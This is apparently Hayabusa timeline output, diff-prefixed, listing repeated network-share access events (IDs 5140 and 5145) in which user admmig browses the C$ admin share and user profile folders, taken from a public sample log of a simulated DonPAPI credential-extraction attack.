+2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.736 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.848 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
